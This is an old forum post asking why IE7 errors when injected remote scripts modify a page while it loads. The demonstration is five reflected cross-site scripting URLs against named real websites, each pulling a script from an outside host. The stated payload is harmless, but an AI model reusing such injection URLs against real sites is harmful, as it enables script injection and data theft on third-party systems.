anyone know why this occurs in ie7..? or better, a workaround. it generates an error in (dynamically loaded?) remote scripts that modify the HTML inside the body, before it finishes loading. if these don't generate an error like the following, reload the page once it finishes and the cached script should load fast enough to generate it.
these links should do it:
http://www.dataplace.org/login.html?username=%22%3E%3Cscript>qwe=document.createElement('script')%3Bqwe.src='http://maluc.sitesled.com/errortest.js'%3bdocument.appendChild(qwe)%3B</script>
http://www.dataplace.org/login.html?username=%22%3E%3Cscript+src='http://maluc.sitesled.com/errortest.js'></script>
http://www.rsnake.com/results.jsp?searchTerm=%3Cscript%20src=%22http://maluc.sitesled.com/errortest.js%22%3E%3C%2Fscript%3E&w=
http://www.wine.com/search/noresults.asp?Ntt=%22%3E%3Cscript%20src=%22http://maluc.sitesled.com/errortest.js%22%3E%3C%2Fscript%3E&D=blah
http://www.ohnorobot.com/index.pl?s=%3C%2Ftitle%3E%3Cscript%20src=http://maluc.sitesled.com/errortest.js%3E%3C%2Fscript%3E&Search=Search&comic=23&t=1&b=1&n=&d=&e=&m=
all that errortest.js is, is a one line: document.write('woooo');
was this some intentional 'security' feature? or some error in its HTML engine when being modified during download
-maluc
Edited 2 time(s). Last edit at 10/28/2006 09:17PM by maluc.